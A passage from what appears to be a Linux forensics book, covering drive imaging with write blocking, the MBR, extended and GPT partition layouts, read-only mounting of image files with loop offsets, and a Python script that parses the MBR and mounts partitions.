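         split($6, id, ":")            # field 6 is <vendor>:<product>
         print "--vid " id[1] " --pid " id[2]
       }'
}
```

Running lsusb | hub_install_args prints one line per hub, including the root hubs built into the computer, so you still need to pick the entry (or the two entries, for a USB 3.0 hub) that belongs to your external hub.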
Live Linux distributions
The preferred method of creating an image of a hard drive is to remove it from the subject system. This is not always practical, however. For example, some laptops (including the one I am currently using to write this book) must be disassembled to remove the hard drive as they lack access panels for this purpose. Booting a live Linux distribution in forensics mode can be the easiest option for these types of situations.
There are a couple of options available. Most any live Linux will work, but it never hurts to use a forensics-oriented distribution like SIFT. You can either install it to its own USB drive or use the same USB drive that you use for your known-good binaries. As I said earlier in this book, if you do this you will need to format the drive with multiple partitions. The first must be FAT in order for it to boot, and the partition with the binaries must be formatted as ext2, ext3, or ext4 to preserve permissions.
There are some that like to use a live Linux distribution on the forensics workstation. I recommend against doing this. My primary objection to doing this is that the performance is always relatively poor when running a live Linux distribution, as everything is run in RAM. If you are just running the live Linux distribution for the write blocking, I recommend you just use my udev rules-based blocking described earlier in this chapter.
CREATING AN IMAGE FROM A VIRTUAL MACHINE
While you are not likely to need to create an image from a virtual machine professionally, you might wish to do so if you are practicing and/or following along with some of the examples from this book. If all you need is a raw image, you can use the tools that come with VirtualBox to create it.
One downside of using the VirtualBox tools is that you won’t get the hashes dcfldd provides. Another downside is that you won’t get to practice using the tools you need for imaging a physical drive. The command to create the image from a Linux host is vboxmanage clonehd <virtual disk image file> <output raw image file> --format RAW.
If you are hosting your virtual machine on Linux, you can still use the standard tools such as dcfldd. The reason that this works is that Linux is smart enough to treat this virtual image file like a real device. This can be verified by running the command fdisk <virtual disk image file>. The results of running this command against a virtual machine hard drive are shown in Figure 4.3.
FIGURE 4.3
Results of running fdisk against a virtual machine image.
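If you do create a raw image with the VirtualBox tools, the missing hashes can be computed afterward. The following is only a minimal sketch, written for Python 3, and is not one of the scripts that accompany this book. The function name hash_image and the default of SHA-256 are assumptions made for illustration.

```python
import hashlib


def hash_image(path, algorithm="sha256", chunk_size=1024 * 1024):
    """Return the hex digest of a file, reading it one chunk at a time."""
    digest = hashlib.new(algorithm)
    with open(path, "rb") as image:
        # iter() with a sentinel keeps calling read() until it returns b""
        for chunk in iter(lambda: image.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

Reading in chunks keeps memory use flat no matter how large the image is. Record the resulting digest in your case notes just as you would a hash produced by dcfldd.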
CREATING AN IMAGE FROM A PHYSICAL DRIVE
Creating an image from physical media is a pretty simple process if the media has been removed. You can use a commercial write blocker if you have one. Personally, I prefer to use the udev rules-based system described earlier in this chapter. Regardless of what you use for write blocking, I strongly recommend you use USB 3.0 devices.
My personal setup consists of a Sabrent USB 3.0 hub model HB-UM43, which provides write blocking via my udev rules system, and a Sabrent USB 3.0 SATA drive dock model DS-UBLK. This combination can be purchased from multiple vendors for under US$40. My setup is shown in Figure 4.4.
FIGURE 4.4
An affordable disk imaging system.
SUMMARY
In this chapter we discussed how to create disk images. This included imaging tools such as dcfldd, software and hardware write-blockers, techniques, and inexpensive hardware options. In the next chapter we will delve into the topic of actually mounting these images so we can begin our dead (filesystem) analysis.
CHAPTER 5
Mounting Images
INFORMATION IN THIS CHAPTER:
Master Boot Record-based Partitions
Extended Partitions
GUID Partition Table Partitions
Mounting Partitions
Using Python to Automate the Mounting Process
PARTITION BASICS
It was common for early personal computers to have a single filesystem on their hard drives. Of course it was also common for their capacities to be measured in single digit megabytes. Once drives started becoming larger, people began organizing them into partitions.
Initially up to four partitions were available. When this was no longer enough, an inelegant solution, known as extended partitions, was developed in order to allow more than four partitions to be created on a drive. People put up with this kludge for decades before a better solution was developed. All of these partitioning systems will be discussed in detail in this chapter starting with the oldest.
Hard drives are described by the number of read/write heads, cylinders, and sectors. Each platter has circles of data which are called tracks. When you stack multiple circles on top of each other they start to look like a cylinder and that is exactly what we call tracks that are on top of each other physically. Even when there is only one platter, there is a track on each side of the platter. The tracks are divided into chunks called sectors. Hard disk geometry is shown in Figure 5.1.
FIGURE 5.1
Hard disk geometry.
You will see entries for cylinders, heads, and sectors in some of the data structures discussed in this chapter. Most modern media use logical block addressing, but these remnants of an earlier time are still found. Whether or not these values are used is another story.
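To make the relationship between the two addressing schemes concrete, here is a small sketch of the conventional translation from a cylinder/head/sector address to a logical block address. It is written for Python 3. The function name and parameter names are illustrative assumptions, and the geometry values must come from the drive in question.

```python
def chs_to_lba(cylinder, head, sector, heads_per_cylinder, sectors_per_track):
    """Translate a CHS address to an LBA using the conventional formula.

    Cylinders and heads are numbered from 0, but sectors are numbered from 1.
    """
    if not 1 <= sector <= sectors_per_track:
        raise ValueError("sector must be between 1 and sectors_per_track")
    if not 0 <= head < heads_per_cylinder:
        raise ValueError("head must be between 0 and heads_per_cylinder - 1")
    return (cylinder * heads_per_cylinder + head) * sectors_per_track + (sector - 1)
```

For example, with an assumed geometry of 255 heads and 63 sectors per track, chs_to_lba(0, 1, 1, 255, 63) evaluates to 63, which is a starting sector you will see on many older images.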
MASTER BOOT RECORD PARTITIONS
The first method of having multiple partitions was to create something called a Master Boot Record (MBR) on the first sector of the hard disk. This was developed way back in the 1980s. A maximum of four partitions are permitted in the Master Boot Record. At most one of these four partitions can be marked as bootable. The overall format for an MBR is shown in Table 5.1.
Table 5.1. Master Boot Record Format
Offset        Length        Item
0 (0x00)      446 (0x1BE)   Boot code
446 (0x1BE)   16 (0x10)     First partition
462 (0x1CE)   16 (0x10)     Second partition
478 (0x1DE)   16 (0x10)     Third partition
494 (0x1EE)   16 (0x10)     Fourth partition
510 (0x1FE)   2 (0x2)       Signature 0x55 0xAA
Each of the partition entries in the MBR contains the information shown in Table 5.2.
Table 5.2. Partition Entry Format
Offset      Length     Item
0 (0x00)    1 (0x01)   Active flag (0x80 = bootable)
1 (0x01)    1 (0x01)   Start head
2 (0x02)    1 (0x01)   Start sector (bits 0-5); upper bits of cylinder (6-7)
3 (0x03)    1 (0x01)   Start cylinder lowest 8 bits
4 (0x04)    1 (0x01)   Partition type code (0x83 = Linux)
5 (0x05)    1 (0x01)   End head
6 (0x06)    1 (0x01)   End sector (bits 0-5); upper bits of cylinder (6-7)
7 (0x07)    1 (0x01)   End cylinder lowest 8 bits
8 (0x08)    4 (0x04)   Sectors preceding partition (little endian)
12 (0x0C)   4 (0x04)   Sectors in partition
Let’s discuss these fields in the partition entries one at a time. The first entry is an active flag where 0x80 means active and anything else (usually 0x00) is interpreted as inactive. In the Master Boot Record active means it is bootable. For obvious reasons there can be at most one bootable partition. That doesn’t mean that you cannot boot multiple operating systems, just that you must boot to some sort of selection menu program to do so.
The next entry is the starting head for the partition. This is followed by the starting sector and cylinder. Because the number of cylinders might exceed 255 and it is unlikely that so many sectors would be in a single track, the upper two bits from the byte storing the sector are the upper two bits for the cylinder. This system allows up to 63 sectors per track (sector numbers start at 1, so the value 0 is not used) and 1024 cylinders. Note that with only three bytes of storage partitions must begin within the first eight gigabytes of the disk assuming standard 512 byte sectors.
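The bit packing described above is easier to follow in code. This sketch, written for Python 3 (where indexing a bytes object yields an integer), decodes the three address bytes of a partition entry. The function name decode_chs is an assumption made for illustration.

```python
def decode_chs(raw):
    """Decode the 3-byte CHS field of an MBR partition entry.

    raw[0] is the head, raw[1] holds the sector in bits 0-5 and the two
    upper cylinder bits in bits 6-7, and raw[2] is the low 8 cylinder bits.
    """
    head = raw[0]
    sector = raw[1] & 0x3F                      # keep the low six bits
    cylinder = ((raw[1] & 0xC0) << 2) | raw[2]  # move bits 6-7 up to bits 8-9
    return cylinder, head, sector
```

Bytes 1 through 3 of a partition entry would be passed for the starting address, and bytes 5 through 7 for the ending address.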
The entry following the starting address is a partition type code. For Windows systems this type code is used to determine the filesystem type. Linux systems normally use 0x83 as the partition type and any supported filesystem may be installed on the partition. Partition type 0x82 is used for Linux swap partitions.
The cylinder/head/sector address of the end of the partition follows the partition type. The same format is used as that for the starting address of the partition. The number of sectors preceding the partition and total sectors occupy the last two positions in the partition entry. Note that these are both 32-bit values which, with 512 byte sectors, allows devices up to two terabytes (2048 gigabytes) to be supported. Most modern devices use Logical Block Addressing (LBA) and the cylinder/head/sector addresses are essentially ignored.
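The two size limits mentioned in this section follow directly from the field widths. The arithmetic below is a quick check in Python 3, assuming 512 byte sectors as the text does. The variable names are illustrative.

```python
SECTOR_SIZE = 512  # bytes; an assumption, as in the text

# CHS: 10-bit cylinder (1024 values), 8-bit head (256 values), and a
# 6-bit sector field numbered from 1 (63 usable values)
chs_sectors = 1024 * 256 * 63
chs_limit_bytes = chs_sectors * SECTOR_SIZE

# LBA: the "sectors preceding" and "sectors in partition" fields are 32 bits
lba_limit_bytes = (2 ** 32) * SECTOR_SIZE

print("CHS limit: %.3f GiB" % (chs_limit_bytes / float(2 ** 30)))
print("LBA limit: %.1f TiB" % (lba_limit_bytes / float(2 ** 40)))
```

The first figure works out to just under eight binary gigabytes and the second to exactly two binary terabytes.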
EXTENDED PARTITIONS
When four partitions were no longer enough, a new system was invented. This system consists of creating one or more extended partitions in the four available slots in the MBR. The most common extended partition types are 0x05 and 0x85, with the former used by Windows and Linux and the latter used only by Linux. Each extended partition becomes a logical drive with an MBR of its own. Normally only the first two slots in the extended partition MBR are used.
The addresses in partition entries in the extended partition’s MBR are relative to the start of the extended partition (it is its own logical drive after all). Logical partitions in the extended partition can also be extended partitions. In other words, extended partitions can be nested which allows more than eight partitions to be created. In the case of nested extended partitions, the last partition is indicated by an empty entry in the second slot in that extended partition’s MBR. Nested extended partitions are shown in Figure 5.2.
FIGURE 5.2
Nested Extended Partitions.
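Walking a chain of nested extended partitions can be sketched in a few lines. The code below is written for Python 3 and is not one of this book’s scripts. It assumes the commonly documented convention that the first slot of each mini-MBR is relative to the sector holding that mini-MBR, while the second slot (the link to the next mini-MBR) is relative to the start of the outermost extended partition. The names read_entry and walk_extended are hypothetical, and you should verify the convention against fdisk output for your image.

```python
import struct

EXTENDED_TYPES = (0x05, 0x0F, 0x85)


def read_entry(sector, slot):
    """Return (type, relative start, sector count) for one 16-byte slot."""
    offset = 446 + slot * 16
    ptype = sector[offset + 4]
    start, count = struct.unpack("<II", sector[offset + 8:offset + 16])
    return ptype, start, count


def walk_extended(image, ext_start, sector_size=512):
    """Yield (type, absolute start, sectors) for each logical partition.

    image is a file object opened in binary mode and ext_start is the
    absolute starting sector of the outermost extended partition.
    """
    ebr = ext_start
    seen = set()  # guards against a corrupt chain that loops back on itself
    while ebr not in seen:
        seen.add(ebr)
        image.seek(ebr * sector_size)
        sector = image.read(sector_size)
        if len(sector) < 512 or sector[510:512] != b"\x55\xaa":
            break
        ptype, start, count = read_entry(sector, 0)
        if ptype != 0:
            yield ptype, ebr + start, count
        link_type, link_start, _ = read_entry(sector, 1)
        if link_type not in EXTENDED_TYPES:
            break  # an empty second slot ends the chain
        ebr = ext_start + link_start
```

The absolute starting sectors produced this way are the same values fdisk reports, and they are what you need to compute a mount offset.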
GUID PARTITIONS
The method of creating partitions is not the only thing showing its age. The Basic Input Output System (BIOS) boot process is also quite outdated. Under the BIOS boot process an ultramodern 64-bit computer is not started in 64-bit mode. It isn’t even started in 32-bit mode. The CPU is forced to regress all the way back to 16-bit real mode. In fact, if you examine the boot code in the MBR you will discover that it is 16-bit machine code.
The BIOS boot process has been replaced with the Unified Extensible Firmware Interface (UEFI) boot process. UEFI (pronounced ooh-fee) booting allows a computer to start in 64-bit mode directly. All 64-bit computers shipped today use UEFI and not BIOS for booting, although they support legacy booting from MBR-based drives. This legacy support is primarily intended to allow booting from removable media such as DVDs and USB drives.
A new method of specifying partitions was also created to go along with UEFI. This new method assigns a Globally Unique Identifier (GUID) to each partition. The GUIDs are stored in a GUID Partition Table (GPT). The GPT has space for 128 partitions. In addition to the primary GPT, there is a secondary GPT stored at the end of the disk (highest numbered logical block) to mitigate the chances of bad sectors in the GPT rendering a disk unreadable.
A drive using GUID partitioning begins with a protective MBR. This MBR has a single entry covering the entire disk with a partition type of 0xEE. Legacy systems that don’t know how to process a GPT also don’t know what to do with a partition of type 0xEE so they will ignore the entire drive. This is preferable to having the drive accidentally formatted if it appears empty or unformatted.
As has been mentioned previously, modern systems use Logical Block Addressing (LBA). The protective MBR is stored in LBA 0. The primary GPT begins with a header in LBA 1, followed by GPT entries in LBA 2 through LBA 33 (128 entries of 128 bytes each occupy 32 blocks of 512 bytes). Each GPT entry requires 128 bytes. As a result, there are four entries per standard 512 byte block. While GPT entries are 128 bytes today, the specification allows for larger entries (with size specified in the GPT header) to be used in the future. Blocks are probably 512 bytes long, but this should not be assumed. The secondary GPT header is stored in the last LBA and the secondary GPT entries are stored in the preceding 32 sectors. The layout of a GPT-based drive is shown in Figure 5.3.
FIGURE 5.3
Layout of a drive with GUID partitioning.
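The block numbers in this layout can be derived rather than memorized. The following Python 3 sketch computes them from the entry count, entry size, and block size. The function name gpt_layout and the dictionary keys are assumptions for illustration, and the defaults are simply the usual values described above.

```python
def gpt_layout(total_blocks, num_entries=128, entry_size=128, block_size=512):
    """Return the LBA ranges used by the primary and secondary GPT."""
    # round up in case the entry array does not fill its last block
    entry_blocks = (num_entries * entry_size + block_size - 1) // block_size
    last = total_blocks - 1
    return {
        "protective_mbr": 0,
        "primary_header": 1,
        "primary_entries": (2, 2 + entry_blocks - 1),
        "first_usable": 2 + entry_blocks,
        "last_usable": last - entry_blocks - 1,
        "secondary_entries": (last - entry_blocks, last - 1),
        "secondary_header": last,
    }
```

With the default values the primary entries occupy LBA 2 through LBA 33 and the first block available to partitions is LBA 34. On a real image these numbers should be read from the GPT header rather than assumed.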
The GPT header format is shown in Table 5.3. When attempting to mount images of drives using GUID partitioning, this header should be checked in order to future proof any scripts should the default values shown in the table change.
Table 5.3. GUID Partition Table Header Format.
Offset      Length     Contents
0 (0x00)    8 bytes    Signature (“EFI PART” or 0x5452415020494645)
8 (0x08)    4 bytes    Revision in Binary Coded Decimal format (version 1.0 = 0x00 0x00 0x01 0x00)
12 (0x0C)   4 bytes    Header size in bytes (92 bytes at present)
16 (0x10)   4 bytes    Header CRC32 checksum
20 (0x14)   4 bytes    Reserved; must be zero
24 (0x18)   8 bytes    Current LBA (where this header is located)
32 (0x20)   8 bytes    Backup LBA (where the other header is located)
40 (0x28)   8 bytes    First usable LBA for partitions
48 (0x30)   8 bytes    Last usable LBA for partitions
56 (0x38)   16 bytes   Disk GUID
72 (0x48)   8 bytes    Starting LBA of array of partition entries
80 (0x50)   4 bytes    Number of partition entries in array
84 (0x54)   4 bytes    Size of a single partition entry (usually 128)
88 (0x58)   4 bytes    CRC32 checksum of the partition array
92 (0x5C)   -          Reserved; must be zeroes for the rest of the block
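The header in Table 5.3 maps neatly onto a single struct format string. The sketch below is written for Python 3 and is an illustration rather than one of this book’s scripts. The names GptHeader and parse_gpt_header and the field names are assumptions, and the CRC32 values are not verified here.

```python
import struct
import uuid
from collections import namedtuple

# One specifier per row of Table 5.3; "<" means little endian, no padding
GPT_HEADER = struct.Struct("<8sIIIIQQQQ16sQIII")  # 92 bytes in total

GptHeader = namedtuple("GptHeader", [
    "signature", "revision", "header_size", "header_crc32", "reserved",
    "current_lba", "backup_lba", "first_usable_lba", "last_usable_lba",
    "disk_guid", "entries_lba", "num_entries", "entry_size",
    "entries_crc32"])


def parse_gpt_header(block):
    """Decode the GPT header found at the start of LBA 1."""
    header = GptHeader(*GPT_HEADER.unpack(block[:GPT_HEADER.size]))
    if header.signature != b"EFI PART":
        raise ValueError("not a GPT header")
    # GUIDs are stored with their first three fields in little endian order
    return header._replace(disk_guid=uuid.UUID(bytes_le=header.disk_guid))
```

Reading entries_lba, num_entries, and entry_size from the header, instead of assuming 2, 128, and 128, is what keeps a script working if those defaults ever change.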
The format for each partition entry is shown in Table 5.4. The format for the attributes field in these entries is shown in Table 5.5. Unlike MBR-based partitions with one byte to indicate partition type, GPT-based partitions have a 16-byte GUID for specifying the partition type. This type GUID is followed by a partition GUID (essentially a serial number) which is also sixteen bytes long. You might see Linux documentation refer to this partition GUID as a Universally Unique Identifier (UUID).
Table 5.4. GUID Partition Table Entry Format.
Offset      Length      Item
0 (0x00)    16 (0x10)   Partition type GUID
16 (0x10)   16 (0x10)   Unique partition GUID
32 (0x20)   8 (0x08)    First LBA
40 (0x28)   8 (0x08)    Last LBA
48 (0x30)   8 (0x08)    Attributes
56 (0x38)   72 (0x48)   Partition name (UTF-16 encoding)
Table 5.5. GUID Partition Table Entry Attributes Format.
Bit     Content            Description
0       System partition   Must preserve partition as is
1       EFI Firmware       Operating system should ignore this partition
2       Legacy BIOS boot   Equivalent to 0x80 in MBR
3-47    Reserved           Should be zeros
48-63   Type specific      Varies by partition type (60 = RO, 62 = Hidden, 63 = No automount for Windows)
The start and end LBA follow the UUID. Next comes the attributes and then the partition name which can be up to 36 Unicode characters long. Attribute fields are 64 bits long. As can be seen in Table 5.5, the lowest three bits are used to indicate a system partition, firmware partition, and support for legacy boot. System partitions are not to be changed and firmware partitions are to be completely ignored by operating systems. The meaning of the upper sixteen bits of the attribute field depends on the partition type.
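A single 128-byte entry can be decoded in much the same way as the header. The following Python 3 sketch follows Tables 5.4 and 5.5. The function name parse_gpt_entry and the dictionary keys are assumptions for illustration, and the treatment of an all-zero type GUID as an unused entry is my reading of the specification rather than something covered above.

```python
import struct
import uuid

GPT_ENTRY = struct.Struct("<16s16sQQQ72s")  # 128 bytes, as in Table 5.4


def parse_gpt_entry(raw):
    """Decode one GPT partition entry into a dictionary."""
    type_guid, part_guid, first_lba, last_lba, attrs, name = \
        GPT_ENTRY.unpack(raw[:GPT_ENTRY.size])
    return {
        "unused": type_guid == b"\x00" * 16,  # assumption: zero GUID = empty
        "type_guid": uuid.UUID(bytes_le=type_guid),
        "part_guid": uuid.UUID(bytes_le=part_guid),
        "first_lba": first_lba,
        "last_lba": last_lba,
        "system": bool(attrs & (1 << 0)),
        "firmware": bool(attrs & (1 << 1)),
        "legacy_boot": bool(attrs & (1 << 2)),
        "type_specific": attrs >> 48,         # upper sixteen bits
        # the name is null-padded UTF-16; keep only what precedes the padding
        "name": name.decode("utf-16-le").split("\x00", 1)[0],
    }
```

The first_lba value multiplied by the block size gives the byte offset needed when mounting the partition.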
MOUNTING PARTITIONS FROM AN IMAGE FILE ON LINUX
Linux is the best choice for a forensics platform for several reasons, regardless of operating system used by the subject system. One of the many reasons that this is true is the ease with which an image file can be mounted. Once filesystems in an image have been mounted all of the standard system tools can be used as part of the investigation.
Linux tools, such as fdisk, can also be used directly on an image file. This fact might not be immediately obvious, but we will show it to be true. The key to being able to use our normal tools is Linux’s support for loop devices. In a nutshell, a loop device allows a file to be treated as a block device by Linux.
The command for running fdisk on an image is simply fdisk <image file>. After fdisk has been run, the partition table is easily printed by typing p <enter>. The key piece of information you need for each partition to mount it is the starting sector (LBA). The results of running fdisk and printing the partition table for a Windows virtual machine image are shown in Figure 5.4. Note that in most cases we do not need to know the partition type as the Linux mount command is smart enough to figure this out on its own.
The single primary partition in the image from Figure 5.4 begins at sector 63. In order to mount this image we need to first create a mount point directory by typing sudo mkdir <mount point>, for example sudo mkdir /media/win-c. Next we need to mount the filesystem using the mount command. The general syntax for the command is mount [options] <source device> <mount point directory>.
FIGURE 5.4
Running fdisk on an image file. Note that root privileges are not required to run fdisk on an image. The starting sector will be needed later for mounting.
The options required to mount an image in a forensically sound way are ro (read-only) and noatime (no access time updating). The second option might seem unnecessary, but it ensures that certain internal timestamps are not updated accidentally. Mounting an image file requires the loop and offset options.
Putting all of these together, the full mount command is sudo mount -o ro,noatime,loop,offset=<offset to start of partition in bytes> <image file> <mount point directory>. The offset can be calculated using a calculator or a little bash shell trick. Just like commands can be executed by enclosing them in $(), you can do math on the command line by enclosing mathematical operations in $(()).
Using our bash shell trick, the proper command is sudo mount -o ro,noatime,loop,offset=$((<starting sector>*512)) <image file> <mount point directory>. The series of commands to mount the image from Figure 5.4 are shown in Figure 5.5.
FIGURE 5.5
Mounting a single primary partition from an image file.
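The same offset arithmetic carries over directly to Python. This small Python 3 sketch only builds the argument list for the mount command and does not run anything. The function name build_mount_command is an assumption made for illustration.

```python
def build_mount_command(image, mount_point, start_sector, sector_size=512):
    """Return the argument list for a read-only loop mount of one partition."""
    # mount wants the offset in bytes, while fdisk reports sectors
    options = "ro,noatime,loop,offset=%d" % (start_sector * sector_size)
    return ["mount", "-o", options, image, mount_point]
```

For the partition starting at sector 63, the options string becomes ro,noatime,loop,offset=32256. The resulting list is in the form expected by subprocess.call(), and the command must still be run with root privileges.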
What if your image contains extended partitions? The procedure is exactly the same. An image with an extended partition is shown in Figure 5.6. Note that fdisk translates the relative sector addresses inside the extended partition to absolute addresses in the overall image. Also note that the swap partition inside the extended primary partition starts two sectors into the partition. The first sector is used by the extended partition’s mini-MBR and the second is just padding to make the swap partition start on an even-numbered sector.
The mini-MBR from the extended partition in the image from Figure 5.6 is shown in Figure 5.7. The partition type, 0x82, is highlighted in the figure. Recall that this is the type code for a Linux swap partition. Notice that the second MBR entry is blank indicating that there are no extended partitions nested inside this one. The dd command was used to generate this figure.
FIGURE 5.6
An image file with an extended partition.
FIGURE 5.7
A mini-MBR from an extended partition. The highlighted byte is the partition type, 0x82, which indicates this is a swap partition. Note that the second entry is blank indicating there are no nested extended partitions under this one.
A quick way to view a single sector from an image is to issue the command dd skip=<sector number> bs=<sector size> count=1 if=<image file> | xxd. The command used to generate Figure 5.7 was dd skip=33556478 bs=512 count=1 if=pentester-academy-subject1-flat.vmdk | xxd. It is important to realize that dd uses blocks (with a default block size of 512) whereas mount uses bytes. This is why we don’t have to do any math to use dd.
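The same single-sector read is easy to reproduce from Python, which becomes useful once scripts start interpreting these sectors. This is a minimal Python 3 sketch, and the function name read_sector is an assumption.

```python
def read_sector(path, sector_number, sector_size=512):
    """Return the raw bytes of one sector from an image file."""
    with open(path, "rb") as image:
        # seek() works in bytes, so the sector number must be scaled
        image.seek(sector_number * sector_size)
        return image.read(sector_size)
```

Unlike dd, seek() takes a byte offset, so here the multiplication by the sector size cannot be skipped.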
The commands required and also the results of mounting the primary partition from Figure 5.6 are shown in Figure 5.8. Notice that my Ubuntu system automatically popped up the file browser window shown. This is an example of behavior that can be customized using udev rules as described earlier in this book.
FIGURE 5.8
Mounting a Linux partition in an image from the command line.
What if your subject system is using GUID Partition Tables (GPT)? The results of running fdisk against such a system are shown in Figure 5.9. The only partition displayed covers the entire disk and has type 0xEE. This is the protective MBR discussed earlier in this chapter. Note that fdisk displays a warning that includes the correct utility to run for GPT drives.
FIGURE 5.9
Running fdisk on a drive that uses GUID Partition Tables.
The results of running parted on the GPT drive from Figure 5.9 are shown in Figure 5.10. In the figure we see a system partition which is marked as bootable, several NTFS partitions, an ext4 and Linux swap partitions. This is a computer that came preloaded with Windows 8.1 with secure boot (which really means make it difficult to boot anything other than Windows) which has had Linux installed after the fact.
FIGURE 5.10
Result of running parted on the GPT drive from Figure 5.9.
You may have noticed that the results displayed in Figure 5.10 specify the start and stop of partitions in kilobytes, megabytes, and gigabytes. In order to mount a partition we need to know the exact start of each partition. The unit command in parted allows us to specify how these values are displayed. Two popular choices are s and B which stand for sectors and bytes, respectively. The results of executing the parted print command using both sectors and bytes are shown in Figure 5.11.
FIGURE 5.11
Changing the default units in parted to show partition boundaries in sectors and bytes.
Once the starting offset is known, mounting a partition from a GPT image is exactly the same as the preceding two cases (primary or extended partitions on MBR-based drives). The parted utility can be used on MBR-based drives as well, but the default output is not as easy to use. Next we will discuss using Python to make this mounting process simple regardless of what sort of partitions we are attempting to mount.
USING PYTHON TO AUTOMATE THE MOUNTING PROCESS
Automation is a good thing. It saves time and also prevents mistakes caused by fat-fingering values. Up to this point in the book we have used shell scripting for automation. In order to mount our partitions we will utilize the Python scripting language. As this is not a book on Python, I will primarily only be describing how my scripts work. For readers that want a more in-depth coverage of Python I highly recommend the Python course at PentesterAcademy.com (http://www.pentesteracademy.com/course?id=1).
WHAT IS IT GOOD FOR?
Scripting or Programming Language
You will see me refer to Python as a scripting language in this book. Some might say that it is a programming language. Which is correct? They are both correct. In my mind a scripting language is an interpreted language that allows you to quickly do work. Python certainly meets these criteria.
To me, a programming language is something that is used to create large programs and software systems. There are some that certainly have done this with Python. However, I would argue that Python is not the best choice when performance is an issue and the same program will be run many times without any code modifications. I’m sure that anyone who has ever run a recent version of Metasploit would agree that running large programs written in interpreted languages can be painful.
You might ask why we are switching to Python. This is a valid question. There are a couple of reasons to use Python for this task. First, we are no longer just running programs and pushing bytes around. Rather, we are reading in files, interpreting them, performing calculations, and then running programs. Second, we are looking to build a library of code to use in our investigations. Having Python code that interprets MBR and GPT data is likely to be useful further down the road.
MBR-based primary partitions
We will start with the simplest case, primary partitions from MBR-based drives. I have broken up the mounting code into three separate scripts for simplicity. Feel free to combine them if that is what you prefer. It is open source after all. The following script will mount primary partitions from an MBR-based image file.

#!/usr/bin/python
#
# mount-image.py
# This is a simple Python script that will
# attempt to mount partitions from an image file.
# Images are mounted read-only.
#
# Developed by Dr. Phil Polstra (@ppolstra)
# for PentesterAcademy.com

import sys
import os.path
import subprocess
import struct

"""
Class MbrRecord: decodes a partition record from a Master Boot Record
Usage: rec = MbrRecord(sector, partno) where
    sector is the 512 byte or greater sector containing the MBR
    partno is the partition number 0-3 of interest
rec.printPart() prints partition information
"""
class MbrRecord():
    def __init__(self, sector, partno):
        self.partno = partno
        # first record at offset 446 & records are 16 bytes
        offset = 446 + partno * 16
        self.active = False
        # first byte == 0x80 means active (bootable)
        if sector[offset] == '\x80':
            self.active = True
        self.type = ord(sector[offset+4])
        self.empty = False
        # partition type == 0 means it is empty
        if self.type == 0:
            self.empty = True
        # sector values are 32-bit and stored in little endian format
        self.start = struct.unpack('<I', sector[offset + 8: \
            offset + 12])[0]
        self.sectors = struct.unpack('<I', sector[offset + 12: \
            offset + 16])[0]

    def printPart(self):
        if self.empty == True:
            print("<empty>")
        else:
            outstr = ""
            if self.active == True:
                outstr += "Bootable:"
            outstr += "Type " + str(self.type) + ":"
            outstr += "Start " + str(self.start) + ":"
            outstr += "Total sectors " + str(self.sectors)
            print(outstr)

def usage():
    print("usage " + sys.argv[0] +
        " <image file>\nAttempts to mount partitions from an image file")
    exit(1)

def main():
    if len(sys.argv) < 2:
        usage()
    # read first sector
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        exit(1)
    with open(sys.argv[1], 'rb') as f:
        sector = str(f.read(512))
    if (sector[510] == "\x55" and sector[511] == "\xaa"):
        print("Looks like a MBR or VBR")
        # if it is an MBR bytes 446, 462, 478, and 494 must be 0x80 or 0x00
        if (sector[446] == '\x80' or sector[446] == '\x00') and \
           (sector[462] == '\x80' or sector[462] == '\x00') and \
           (sector[478] == '\x80' or sector[478] == '\x00') and \
           (sector[494] == '\x80' or sector[494] == '\x00'):
            print("Must be a MBR")
            parts = [MbrRecord(sector, 0), MbrRecord(sector, 1), \
                MbrRecord(sector, 2), MbrRecord(sector, 3)]
            for p in parts:
                p.printPart()
                if not p.empty:
                    notsupParts = [0x05, 0x0f, 0x85, 0x91, 0x9b, 0xc5, 0xe4, 0xee]
                    if p.type in notsupParts:
                        print("Sorry GPT and extended partitions are " + "not supported by this script!")
                    else:
                        mountpath = '/media/part%s' % str(p.partno)
                        # if the appropriate directory doesn't exist create it
                        if not os.path.isdir(mountpath):
                            subprocess.call(['mkdir', mountpath])
                        mountopts = 'loop,ro,noatime,offset=%s' % \
                            str(p.start * 512)
                        subprocess.call(['mount', '-o', \
                            mountopts, sys.argv[1], mountpath])
        else:
            print("Appears to be a VBR\nAttempting to mount")
            if not os.path.isdir('/media/part1'):
                subprocess.call(['mkdir', '/media/part1'])
            subprocess.call(['mount', '-o', 'loop,ro,noatime', \
                sys.argv[1], '/media/part1'])

if __name__ == "__main__":
    main()

Let’s break down the preceding script. It begins with the usual she-bang; however, this time we are running the Python interpreter instead of the bash shell. Just as with shell scripts, all of the lines beginning with “#” are comments. We then import Python libraries sys, os.path, subprocess, and struct which are needed to get command line arguments, check for the existence of files, launch other processes or commands, and interpret values in the MBR, respectively.
Next we define a class MbrRecord which is used to decode the four partition entries in the MBR. The class definition is preceded with a Python multi-line comment known as a docstring. Three double quotes on a line start or stop the docstring. Like many object-oriented languages, Python uses classes to implement objects. Python is different from other languages in that it uses indentation to group lines of code together and doesn’t use a line termination character such as the semicolon used by numerous languages.
The line class MbrRecord(): tells the Python interpreter that a class definition for the MbrRecord class follows on indented lines. The empty parentheses indicate that there is no base class. In other words, the MbrRecord is not a more specific (or specialized) version of some other object. Base classes can be useful as they allow you to more easily and elegantly share common code, but they are not used extensively by people who use Python to write quick and dirty scripts to get things done.
The line def __init__(self, sector, partno): inside the MbrRecord class definition begins a function definition. Python allows classes to define functions (sometimes called methods) and values (also called variables, parameters, or data members) that are associated with the class. Every class implicitly defines a value called self that is used to refer to an object of the class type. With a few exceptions (not described in this book) every class function must have self as the first (possibly only) argument it accepts. This argument is implicitly passed by Python. We will talk more about this later as I explain this script.
Every class should define an __init__ function (that is a double underscore preceding and following init). This special function is called a constructor. It is used when an object of a certain type is created. The __init__ function in the MbrRecord class is used as follows:
partition = MbrRecord(sector, partitionNumber)
This creates a new object called partition of the MbrRecord type. If we want to print its contents we can call its printPart function like so:
partition.printPart()
Back to the constructor definition. We first store the passed in partition number in a class value on the line self.partno = partno. Then we calculate the offset into the MBR for the partition of interest with offset = 446 + partno * 16, as the first record is at offset 446 and each record is 16 bytes long.
